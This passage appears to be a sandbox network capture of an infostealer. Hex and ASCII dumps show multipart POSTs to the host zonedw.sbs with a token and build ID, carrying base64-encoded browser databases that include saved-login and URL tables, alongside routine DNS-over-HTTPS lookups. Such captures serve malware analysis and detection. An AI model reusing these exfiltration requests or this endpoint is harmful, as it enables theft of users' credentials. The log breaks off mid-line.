2024-12-13 17:58:37 UTC	16355	OUT	Data Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
2024-12-13 17:58:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.7	50306	162.159.61.3	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:37 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-13 17:58:37 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.7	50307	172.64.41.3	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:38 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-13 17:58:38 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.7	50308	172.64.41.3	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:38 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-13 17:58:38 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.7	50313	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:39 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----PPH47YMGDTRIM7GLNG4O User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 68733 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:39 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 50 50 48 34 37 59 4d 47 44 54 52 49 4d 37 47 4c 4e 47 34 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 50 50 48 34 37 59 4d 47 44 54 52 49 4d 37 47 4c 4e 47 34 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 50 50 48 34 37 59 4d 47 44 54 52 49 4d 37 47 4c 4e 47 34 4f 0d 0a 43 6f 6e 74 Data Ascii: ------PPH47YMGDTRIM7GLNG4OContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------PPH47YMGDTRIM7GLNG4OContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------PPH47YMGDTRIM7GLNG4OCont
2024-12-13 17:58:39 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:39 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
2024-12-13 17:58:39 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:39 UTC	3313	OUT	Data Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31 Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
2024-12-13 17:58:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:41 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.7	50320	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:41 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAA1NOZCT2VAAAIEUSJW User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 262605 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:41 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 41 31 4e 4f 5a 43 54 32 56 41 41 41 49 45 55 53 4a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 31 4e 4f 5a 43 54 32 56 41 41 41 49 45 55 53 4a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 31 4e 4f 5a 43 54 32 56 41 41 41 49 45 55 53 4a 57 0d 0a 43 6f 6e 74 Data Ascii: ------AAA1NOZCT2VAAAIEUSJWContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------AAA1NOZCT2VAAAIEUSJWContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------AAA1NOZCT2VAAAIEUSJWCont
2024-12-13 17:58:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:41 UTC	16355	OUT	Data Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 